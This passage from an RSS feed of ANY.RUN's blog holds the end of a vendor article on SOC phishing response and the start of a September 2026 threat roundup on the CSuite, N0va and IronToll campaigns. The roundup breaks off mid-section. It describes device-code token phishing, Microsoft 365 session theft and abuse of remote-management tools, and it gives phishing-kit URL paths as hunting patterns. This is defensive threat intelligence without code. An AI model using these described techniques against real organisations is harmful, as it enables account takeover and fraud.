<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="333" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/key-iocs-from-tier-1-report-1024x333.png" alt="Key IOCs that support blocking or hunting the phishing attack" class="wp-image-23494" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/key-iocs-from-tier-1-report-1024x333.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/key-iocs-from-tier-1-report-300x98.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/key-iocs-from-tier-1-report-768x250.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/key-iocs-from-tier-1-report-370x120.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/key-iocs-from-tier-1-report-270x88.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/key-iocs-from-tier-1-report-740x241.png 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/key-iocs-from-tier-1-report.png 1122w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Key IOCs that support blocking or hunting the phishing attack</em></figcaption></figure>
</div>


<p class="wp-block-paragraph">The same context can then be passed to Tier 2, IR, or an MSSP customer without asking them to start from the raw analysis again. </p>



<!-- Highlight Block HTML START -->
<div class="window">
  <div class="window-header">
    <div class="pill"><img src="https://s.w.org/images/core/emoji/17.0.2/72x72/261d.png" alt="☝" class="wp-smiley" style="height: 1em; max-height: 1em;" />Step 2  SOC outcomes:</div>
  </div>
  <div class="window-body">
    <ul>
      <li>Fewer unnecessary Tier 1 → Tier 2 escalations</li>
      <li>More senior analyst time preserved for complex incidents</li>
      <li>Clearer handoffs with evidence already packaged</li>
      <li>Shorter path from investigation to containment</li>
    </ul>
  </div>
</div>
<!-- Highlight Block HTML END -->


<!-- Highlight Block CSS START -->
<style>
  .window {
background: rgba(32, 168, 241, 0.1);
border: 1px solid rgba(75, 174, 227, 0.32);

    border-radius: 4px;
    margin: 20px auto 50px auto;
    padding: 20px 40px;
    line-height: 2rem;
  }

  .window-header {
    display: flex;
    justify-content: center;
    margin-bottom: 20px;
  }

  .pill {
    background-color: #fff;
    border-radius: 20px;
    color: #333;
    font-weight: bold;
    padding: 8px 32px;
border: 1px solid rgba(75, 174, 227, 0.32);
  }

  @media (max-width: 480px) {
    .window {
      padding: 10px;
    }
    
    .pill {
      font-size: 14px;
      padding: 6px 12px;
    }
  }
</style>
<!-- Highlight Block CSS END -->



<h3 class="wp-block-heading">Step 3: Move to Proactive Defense with Threat Intelligence </h3>



<p class="wp-block-paragraph">Closing the original phishing alert solves the immediate incident. It does not tell the SOC how far the threat extends. </p>



<p class="wp-block-paragraph">Attackers rotate domains, IPs, and other infrastructure quickly, which means individual IOCs can lose value fast. Once the threat is confirmed, the next step is to look for patterns that can reveal related activity and support hunting, blocking, and new detections. </p>



<p class="wp-block-paragraph">In the EvilTokens case, the sandbox analysis already gives analysts a useful starting point: the HTTP endpoints used during the device code phishing flow. </p>



<p class="wp-block-paragraph">For example: </p>



<p class="wp-block-paragraph">/api/device/start <br>/api/device/status/ </p>



<p class="wp-block-paragraph">These patterns can be taken into <strong>ANY.RUN’s </strong><a href="https://any.run/threat-intelligence-lookup/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=phishing-response-protocol&amp;utm_term=300926&amp;utm_content=linktotilookuplanding" target="_blank" rel="noreferrer noopener"><strong>Threat Intelligence Lookup</strong></a> to find other analyses where the same behavior appears. </p>



<p class="wp-block-paragraph"><a href="https://intelligence.any.run/analysis/lookup?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=phishing-response-protocol&amp;utm_term=300926&amp;utm_content=linktotilookup#{%22query%22:%22url:%5C%22/api/device/start%5C%22%20and%20url:%5C%22/api/device/status/%5C%22%22,%22dateRange%22:180}" target="_blank" rel="noreferrer noopener">View the EvilTokens query in TI Lookup</a> </p>



<p class="wp-block-paragraph">But finding matching analyses is only the first step. The new <strong>Connections</strong> view brings the network artifacts from those results together and shows how URLs, domains, IPs, and other indicators relate to one another. </p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="488" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/TI-connections-1-1024x488.png" alt="Connections view showing related EvilTokens infrastructure inside ANY.RUN’s Threat Intelligence Lookup" class="wp-image-23495" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/TI-connections-1-1024x488.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/TI-connections-1-300x143.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/TI-connections-1-768x366.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/TI-connections-1-1536x732.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/TI-connections-1-370x176.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/TI-connections-1-270x129.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/TI-connections-1-740x353.png 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/TI-connections-1.png 1842w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Connections view showing related EvilTokens infrastructure inside ANY.RUN’s Threat Intelligence Lookup</em></figcaption></figure>
</div>


<p class="wp-block-paragraph">Instead of comparing indicators across separate results one by one, analysts can pivot through the relationships and move from <strong>a single IOC to a testable hypothesis about related infrastructure</strong>. </p>



<p class="wp-block-paragraph">This is especially useful for retrohunting in SIEM or NDR data and for passing relevant findings to detection engineering. </p>



<p class="wp-block-paragraph">Connections also help analysts distinguish useful indicators from shared infrastructure. An IP associated with Cloudflare, for example, may appear in a malicious analysis but should not automatically become a blocking candidate. Filters help narrow the view to the relationships that matter and reduce the risk of pushing noisy or widely shared infrastructure into production defenses. </p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="429" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Threat-landscape-1024x429.png" alt="Wider threat landscape demonstrated inside Threat Intelligence" class="wp-image-23496" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Threat-landscape-1024x429.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Threat-landscape-300x126.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Threat-landscape-768x322.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Threat-landscape-1536x643.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Threat-landscape-370x155.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Threat-landscape-270x113.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Threat-landscape-740x310.png 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Threat-landscape.png 1843w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Wider threat landscape demonstrated inside Threat Intelligence</em></figcaption></figure>
</div>


<p class="wp-block-paragraph"><a href="https://any.run/threat-intelligence-lookup/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=phishing-response-protocol&amp;utm_term=300926&amp;utm_content=linktotilookuplanding" target="_blank" rel="noreferrer noopener">Threat Intelligence Lookup</a> also adds context around the wider threat landscape, including geography and targeted industries, which can support threat hunting, research, and reporting. </p>



<!-- Highlight Block HTML START -->
<div class="window">
  <div class="window-header">
    <div class="pill"><img src="https://s.w.org/images/core/emoji/17.0.2/72x72/261d.png" alt="☝" class="wp-smiley" style="height: 1em; max-height: 1em;" />Step 3: SOC outcomes</div>
  </div>
  <div class="window-body">
    <ul>
      <li>Each investigation produces intelligence the SOC can reuse</li>
      <li>Faster discovery of related infrastructure and attack activity</li>
      <li>More IOCs available for hunting, blocking, and enrichment</li>
      <li>Broader detection coverage beyond the original incident</li>
    </ul>
  </div>
</div>
<!-- Highlight Block HTML END -->


<!-- Highlight Block CSS START -->
<style>
  .window {
    background: rgba(32, 168, 241, 0.1);
    border: 1px solid rgba(75, 174, 227, 0.32);
    border-radius: 4px;
    margin: 20px auto 50px auto;
    padding: 20px 40px;
    line-height: 2rem;
  }

  .window-header {
    display: flex;
    justify-content: center;
    margin-bottom: 20px;
  }

  .pill {
    background-color: #fff;
    border-radius: 20px;
    color: #333;
    font-weight: bold;
    padding: 8px 32px;
    border: 1px solid rgba(75, 174, 227, 0.32);
  }

  @media (max-width: 480px) {
    .window {
      padding: 10px;
    }

    .pill {
      font-size: 14px;
      padding: 6px 12px;
    }
  }
</style>
<!-- Highlight Block CSS END -->



<h3 class="wp-block-heading">What One Phishing Investigation Can Deliver with ANY.RUN’s New Capabilities </h3>



<p class="wp-block-paragraph">Starting with a single phishing URL, the SOC can get much more than a malicious verdict. In this case, the investigation produced: </p>



<ul class="wp-block-list">
<li><strong>Complete picture of the attack:</strong> The execution chain, decrypted HTTP requests and responses, redirect path, and browser changes observed as the phishing page loaded. </li>



<li><strong>Response-ready Tier 1 report:</strong> The verdict, key findings, IOCs, AI-generated summary and recommendations, and the context needed for escalation and response. </li>



<li><strong>Wider view of the threat:</strong> Related analyses, infrastructure, and connections that help analysts understand how far the activity extends beyond the original URL. </li>
</ul>



<p class="wp-block-paragraph">Without these capabilities, the same investigation could require separate traffic analysis, browser inspection, threat intelligence research, and incident reporting, with analysts moving findings between each stage themselves. </p>



<p class="wp-block-paragraph">That difference becomes much more important at scale. When a SOC or CSIRT handles hundreds or thousands of incidents, time spent rebuilding context for every case quickly adds up. </p>



<h2 class="wp-block-heading">The Business Impact of Faster Phishing Response </h2>



<p class="wp-block-paragraph">Faster phishing response is not only an analyst productivity win. It directly affects SOC capacity, escalation costs, and how long the business stays exposed to a confirmed threat. </p>



<p class="wp-block-paragraph">ANY.RUN customers have reported <strong>20% less Tier 1 investigation time, 30% fewer Tier 1-to-Tier 2 escalations, and 21 minutes cut from MTTR</strong>. For security leaders, that means more cases handled by the existing team, less senior analyst time spent on routine work, and faster containment when an attack is real. </p>



<p class="wp-block-paragraph">With updates such as SSL Decryption and In-Browser Data Inspection, Tier 1 reports with AI insights, and Connections in TI Lookup, it becomes easier to carry the same investigation from triage to response and proactive defense without adding more manual steps. </p>



<!-- Regular Banner START -->
<div class="regular-banner">
<!-- Text Content -->
<p class="regular-banner__text">
<span class="highlight">Bring faster phishing response into your SOC.

</span> 
<br>
Give your team the visibility and context they need to act sooner.
</p>
<!-- CTA Link -->
<a class="regular-banner__link" id="article-banner-regular" href="https://any.run/enterprise/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=phishing-response-protocol&amp;utm_term=300926&amp;utm_content=linktoenterprise#contact-sales" rel="noopener" target="_blank">
 Build a Faster SOC Workflow</a>
</div>
<!-- Regular Banner END -->
<!-- Regular Banner Styles START -->

<style>
.regular-banner {
display: flex;
text-align: center;
flex-direction: column;
align-items: center;
gap: 1.5rem;
width: 100%;
padding: 2rem;
margin: 1.5rem 0;
border-radius: 0.5rem;
font-family: 'Catamaran Bold';
margin-inline: auto;
background: rgba(32, 168, 241, 0.1);
border: 1px solid rgba(75, 174, 227, 0.32);
}

.regular-banner__text {
font-size: 1.5rem;
margin: 0;
}

.highlight {
color: #ea2526;
}

.regular-banner__link {
padding: 0.5rem 1.5rem;
font-weight: 500;
text-decoration: none;
border-radius: 0.5rem;
color: #FFFFFF;
background-color: #1491D4;
text-align: center;
transition: all 0.2s ease-in;
}

.regular-banner__link:hover {
background-color: #68CBFF;
color: white;
}
</style>
<!-- Regular Banner Styles END -->



<h2 class="wp-block-heading">About ANY.RUN </h2>



<p class="wp-block-paragraph"><a href="https://any.run/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=phishing-response-protocol&amp;utm_term=300926&amp;utm_content=linktolanding" target="_blank" rel="noreferrer noopener">ANY.RUN</a> provides interactive malware analysis and threat intelligence solutions used by 700,000+ cybersecurity professionals across 16,000+ organizations worldwide, including 64% of the Fortune 500. </p>



<p class="wp-block-paragraph">Its <a href="https://any.run/features/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=phishing-response-protocol&amp;utm_term=300926&amp;utm_content=linktosandboxlanding" target="_blank" rel="noreferrer noopener">Interactive Sandbox</a> helps SOC teams safely investigate suspicious files, URLs, phishing pages, and malware while watching the attack unfold in real time. Analysts can inspect browser activity, decrypted network traffic, processes, redirects, and other behavior to validate threats faster and collect evidence for response. </p>



<p class="wp-block-paragraph">ANY.RUN’s <a href="https://any.run/threat-intelligence-lookup/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=phishing-response-protocol&amp;utm_term=300926&amp;utm_content=linktotilookuplanding" target="_blank" rel="noreferrer noopener">Threat Intelligence Lookup</a> turns data from real-world sandbox investigations into context for threat hunting, detection, and incident response. Analysts can pivot from individual indicators to related infrastructure and activity, while <a href="https://any.run/threat-intelligence-feeds/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=phishing-response-protocol&amp;utm_term=300926&amp;utm_content=linktotifeedslanding" target="_blank" rel="noreferrer noopener">Threat Intelligence Feeds</a> continuously deliver newly observed IOCs into existing security systems. </p>
<p>The post <a href="https://any.run/cybersecurity-blog/phishing-response-protocol/">Phishing Response Protocol: 3 Essential SOC Steps Powered by ANY.RUN&#8217;s Latest Updates</a> appeared first on <a href="https://any.run/cybersecurity-blog">ANY.RUN&#039;s Cybersecurity Blog</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://any.run/cybersecurity-blog/phishing-response-protocol/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Major Cyber Attacks in September 2026: US and EU Face Session Theft, Remote Access, and Payment Fraud</title>
		<link>https://any.run/cybersecurity-blog/major-cyber-attacks-september-2026/</link>
					<comments>https://any.run/cybersecurity-blog/major-cyber-attacks-september-2026/#respond</comments>
		
		<dc:creator><![CDATA[ANY.RUN]]></dc:creator>
		<pubDate>Tue, 29 Sep 2026 08:32:51 +0000</pubDate>
				<category><![CDATA[Malware Analysis]]></category>
		<category><![CDATA[ANYRUN]]></category>
		<category><![CDATA[cybersecurity]]></category>
		<category><![CDATA[malware analysis]]></category>
		<guid isPermaLink="false">https://any.run/cybersecurity-blog/?p=23458</guid>

					<description><![CDATA[<p>Cyberattacks observed in September showed how difficult it has become to separate malicious activity from legitimate business workflows. Attackers used trusted cloud services, familiar document-sharing platforms, legitimate authentication flows, remote-management software, and rapidly changing infrastructure to hide different stages of their operations. For SOC teams, this creates a visibility problem: one alert rarely shows the [&#8230;]</p>
<p>The post <a href="https://any.run/cybersecurity-blog/major-cyber-attacks-september-2026/">Major Cyber Attacks in September 2026: US and EU Face Session Theft, Remote Access, and Payment Fraud</a> appeared first on <a href="https://any.run/cybersecurity-blog">ANY.RUN&#039;s Cybersecurity Blog</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p class="wp-block-paragraph">Cyberattacks observed in September showed how difficult it has become to separate malicious activity from legitimate business workflows. </p>



<p class="wp-block-paragraph">Attackers used trusted cloud services, familiar document-sharing platforms, legitimate authentication flows, remote-management software, and rapidly changing infrastructure to hide different stages of their operations. </p>



<p class="wp-block-paragraph">For SOC teams, this creates a visibility problem: one alert rarely shows the full attack. For security leaders, it increases the risk that identity compromise, endpoint access, or payment fraud develops before the real scope of the incident is understood. </p>



<h2 class="wp-block-heading">What September’s Attacks Reveal About US Enterprise Risk </h2>



<ul class="wp-block-list">
<li><strong>Identity compromise is becoming harder to contain</strong>: N0va and CSuite targeted sessions, tokens, and Microsoft 365 access, extending the impact beyond a stolen password.</li>



<li><strong>Automated detection can miss the final phishing stage</strong>: Wazza used routing and anti-bot checks to keep its Device Code phishing page hidden until the right conditions were met.</li>



<li><strong>Trusted software can make malicious activity harder to distinguish</strong>: CSuite and TerminalFix relied on legitimate tools and processes, which can slow down early validation.</li>



<li><strong>Single IOCs provide limited protection on their own</strong>: IronToll rotated disposable infrastructure while keeping recognizable backend patterns in place.</li>



<li><strong>A successful compromise can quickly widen in scope</strong>: Across these campaigns, access to accounts, endpoints, payments, and internal workflows could overlap within the same incident.</li>



<li><strong>The full picture is often spread across several systems</strong>: Identity, browser, endpoint, and network evidence may need to be connected before teams can see how far an attack has progressed.</li>
</ul>



<!-- Regular Banner START -->
<div class="regular-banner">
<!-- Text Content -->
<p class="regular-banner__text">
<span class="highlight">Investigate Faster. Limit Business Impact.

</span> 
<br>
Give Analysts the Context to Act Sooner.
</p>
<!-- CTA Link -->
<a class="regular-banner__link" id="article-banner-regular" href="https://any.run/enterprise/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=major-cyber-attacks-september-2026&amp;utm_term=290926&amp;utm_content=linktoenterprise#contact-sales" rel="noopener" target="_blank">
Strengthen Enterprise Defense</a>
</div>
<!-- Regular Banner END -->
<!-- Regular Banner Styles START -->

<style>
.regular-banner {
display: flex;
text-align: center;
flex-direction: column;
align-items: center;
gap: 1.5rem;
width: 100%;
padding: 2rem;
margin: 1.5rem 0;
border-radius: 0.5rem;
font-family: 'Catamaran Bold';
margin-inline: auto;
background: rgba(32, 168, 241, 0.1);
border: 1px solid rgba(75, 174, 227, 0.32);
}

.regular-banner__text {
font-size: 1.5rem;
margin: 0;
}

.highlight {
color: #ea2526;
}

.regular-banner__link {
padding: 0.5rem 1.5rem;
font-weight: 500;
text-decoration: none;
border-radius: 0.5rem;
color: #FFFFFF;
background-color: #1491D4;
text-align: center;
transition: all 0.2s ease-in;
}

.regular-banner__link:hover {
background-color: #68CBFF;
color: white;
}
</style>
<!-- Regular Banner Styles END -->



<h2 class="wp-block-heading">Who Attackers Targeted in September </h2>



<p class="wp-block-paragraph">September’s threat activity showed a strong focus on US and EU organizations, Microsoft 365 users, and businesses exposed to phishing, remote access, and payment fraud.</p>



<div class="wpdt-c row wpDataTableContainerSimpleTable wpDataTables wpDataTablesWrapper
"
    >
        <table id="wpdtSimpleTable-399"
           style="border-collapse:collapse;
                   border-spacing:0px;"
           class="wpdtSimpleTable wpDataTable"
           data-column="2"
           data-rows="6"
           data-wpID="399"
           data-responsive="0"
           data-has-header="1">

                    <thead>        <tr class="wpdt-cell-row " >
                                <th class="wpdt-cell "
                                            data-cell-id="A1"
                    data-col-index="0"
                    data-row-index="0"
                    style=" width:50%;                    padding:10px;
                    "
                    >
                                        Target Group                     </th>
                                                <th class="wpdt-cell "
                                            data-cell-id="B1"
                    data-col-index="1"
                    data-row-index="0"
                    style=" width:50%;                    padding:10px;
                    "
                    >
                                        What We Observed                     </th>
                                        </tr>
                    <tbody>        <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A2"
                    data-col-index="0"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        US organizations and employees                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B2"
                    data-col-index="1"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        CSuite had a strong US footprint, while TerminalFix and N0va also targeted North America.                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A3"
                    data-col-index="0"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        Technology, manufacturing, government, healthcare and consulting organizations                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B3"
                    data-col-index="1"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        These sectors appeared prominently in CSuite activity.                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A4"
                    data-col-index="0"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        Microsoft 365 users                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B4"
                    data-col-index="1"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        CSuite captured active sessions, while N0va targeted access and refresh tokens.                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A5"
                    data-col-index="0"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        Employees using common business platforms                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B5"
                    data-col-index="1"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        Attackers impersonated Adobe, DocuSign, Zoom, Dropbox, SharePoint, OneDrive, and similar services.                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A6"
                    data-col-index="0"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        Users exposed to payment and delivery lures                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B6"
                    data-col-index="1"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        IronToll used postal, banking, government, parking, and travel-themed phishing.                     </td>
                                        </tr>
                    </table>
</div><style id='wpdt-custom-style-399'>
table#wpdtSimpleTable-399{ table-layout: fixed !important; }
table#wpdtSimpleTable-399 td, table.wpdtSimpleTable399 th { white-space: normal !important; }
</style>




<h2 class="wp-block-heading">CSuite Targets US and EU with Session Theft and RMM Abuse, Expanding Fraud and Access Risk </h2>



<p class="wp-block-paragraph">CSuite is a multi-stage phishing operation that combines Microsoft 365 session theft with remote access through legitimate management tools. ANY.RUN researchers linked 351 sandbox analyses to the campaign, with 51% of submissions coming from the United States.  </p>



<p class="wp-block-paragraph"><a href="https://app.any.run/tasks/10ecee38-5f29-421a-9d6a-9e516ba4deeb/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=major-cyber-attacks-september-2026&amp;utm_term=290926&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener">View sandbox session</a> </p>



<p class="wp-block-paragraph"><a href="https://any.run/cybersecurity-blog/csuite-attack-analysis/" target="_blank" rel="noreferrer noopener">Check details and gather IOCs</a> </p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="768" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Submissions-by-Country-1024x768.png" alt="Sandbox submissions by country" class="wp-image-23229" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Submissions-by-Country-1024x768.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Submissions-by-Country-300x225.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Submissions-by-Country-768x576.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Submissions-by-Country-1536x1152.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Submissions-by-Country-2048x1536.png 2048w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Submissions-by-Country-370x278.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Submissions-by-Country-270x203.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Submissions-by-Country-740x555.png 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Submissions-by-Country-80x60.png 80w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>CSuite sandbox submissions by country</em></figcaption></figure>
</div>


<p class="wp-block-paragraph">The attack starts with business-themed lures impersonating services such as Adobe, DocuSign, Zoom, Google Meet, Dropbox, and Microsoft 365, then routes victims through filtering and counterfeit document pages. Depending on the path, attackers either capture credentials and authenticated sessions or deliver files that install tools such as ScreenConnect, Action1, Atera, Syncro, and PDQ Connect. </p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="649" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/CSuite-Attack-Chain-1-1024x649.png" alt="The attack chain of CSuite campaign" class="wp-image-23223" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/CSuite-Attack-Chain-1-1024x649.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/CSuite-Attack-Chain-1-300x190.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/CSuite-Attack-Chain-1-768x486.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/CSuite-Attack-Chain-1-1536x973.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/CSuite-Attack-Chain-1-2048x1297.png 2048w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/CSuite-Attack-Chain-1-370x234.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/CSuite-Attack-Chain-1-270x171.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/CSuite-Attack-Chain-1-740x469.png 740w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>CSuite attack chain discovered by ANY.RUN</em></figcaption></figure>
</div>


<p class="wp-block-paragraph"><strong>Account and endpoint risk to reduce:</strong> Organizations should treat CSuite as more than a phishing or credential-theft incident. A single compromise can expose Microsoft 365 sessions, business email, and employee endpoints at the same time, creating paths to mailbox abuse, payment fraud, persistent remote access, and follow-on phishing. Containment should include session revocation, mailbox review, checks for unexpected management agents, and investigation of affected endpoints. </p>



<h2 class="wp-block-heading">N0va Targets Microsoft 365 Users with Device Code Phishing, Extending Access Beyond Password Theft </h2>



<p class="wp-block-paragraph">N0va is a phishing kit targeting organizations across North America and Europe with lures impersonating Microsoft Security, Teams, SharePoint, OneDrive, DocuSign, Google Drive, Dropbox, Zoom, and Adobe Sign. The campaign uses Device Code phishing to obtain access and refresh tokens through legitimate Microsoft authentication flows, allowing attackers to bypass the need for stolen passwords alone. </p>



<p class="wp-block-paragraph"><a href="https://app.any.run/tasks/26360cd2-8f2d-4de0-af60-2ec3cf60497c/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=major-cyber-attacks-september-2026&amp;utm_term=290926&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener">View sandbox session with Microsoft-themed lure</a> </p>



<p class="wp-block-paragraph"><a href="https://x.com/anyrun_app/status/2095142285486821549" target="_blank" rel="noreferrer noopener">Check details and gather IOCs</a> </p>


<div class="wp-block-image">
<figure class="aligncenter size-large is-resized"><img loading="lazy" decoding="async" width="819" height="1024" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/N0va-phishkit-attack-details-819x1024.jpeg" alt="N0va phishkit attack details " class="wp-image-23459" style="width:625px;height:auto" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/N0va-phishkit-attack-details-819x1024.jpeg 819w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/N0va-phishkit-attack-details-240x300.jpeg 240w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/N0va-phishkit-attack-details-768x960.jpeg 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/N0va-phishkit-attack-details-1229x1536.jpeg 1229w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/N0va-phishkit-attack-details-1638x2048.jpeg 1638w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/N0va-phishkit-attack-details-370x463.jpeg 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/N0va-phishkit-attack-details-270x338.jpeg 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/N0va-phishkit-attack-details-740x925.jpeg 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/N0va-phishkit-attack-details-scaled.jpeg 2048w" sizes="auto, (max-width: 819px) 100vw, 819px" /><figcaption class="wp-element-caption"><em>N0va phishkit attack details</em></figcaption></figure>
</div>


<p class="wp-block-paragraph">Observed activity also includes token exchange and device registration that can support broader SSO access, while campaign infrastructure is distributed across compromised websites and cloud services such as Cloudflare Workers and Linode Object Storage. </p>



<p class="wp-block-paragraph"><strong>Identity risk to reduce:</strong> Organizations should treat suspicious device-code authentication as a potential token and session compromise, not just a credential issue. Security teams should review active sessions, device registrations, token activity, and follow-on access to confirm whether the attacker still has a valid path into the account. </p>



<!-- Regular Banner START -->
<div class="regular-banner">
<!-- Text Content -->
<p class="regular-banner__text">
<span class="highlight">Turn investigation context into faster action.
</span> 
<br>
Cut MTTR by up to 21 minutes per case.
</p>
<!-- CTA Link -->
<a class="regular-banner__link" id="article-banner-regular" href="https://any.run/enterprise/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=major-cyber-attacks-september-2026&amp;utm_term=290926&amp;utm_content=linktoenterprise#contact-sales" rel="noopener" target="_blank">
Speed Up Threat Response</a>
</div>
<!-- Regular Banner END -->
<!-- Regular Banner Styles START -->

<style>
.regular-banner {
display: flex;
text-align: center;
flex-direction: column;
align-items: center;
gap: 1.5rem;
width: 100%;
padding: 2rem;
margin: 1.5rem 0;
border-radius: 0.5rem;
font-family: 'Catamaran Bold';
margin-inline: auto;
background: rgba(32, 168, 241, 0.1);
border: 1px solid rgba(75, 174, 227, 0.32);
}

.regular-banner__text {
font-size: 1.5rem;
margin: 0;
}

.highlight {
color: #ea2526;
}

.regular-banner__link {
padding: 0.5rem 1.5rem;
font-weight: 500;
text-decoration: none;
border-radius: 0.5rem;
color: #FFFFFF;
background-color: #1491D4;
text-align: center;
transition: all 0.2s ease-in;
}

.regular-banner__link:hover {
background-color: #68CBFF;
color: white;
}
</style>
<!-- Regular Banner Styles END -->



<h2 class="wp-block-heading">IronToll Steals Card Data and OTPs Across 12+ Countries </h2>



<p class="wp-block-paragraph">IronToll is a large multi-country phishing platform, identified with high confidence as the <strong>IronToll (“Iron Man System”)</strong> kit. ANY.RUN researchers connected <strong>114 malicious domains across 71 non-Cloudflare origins</strong> through recurring backend patterns.  </p>



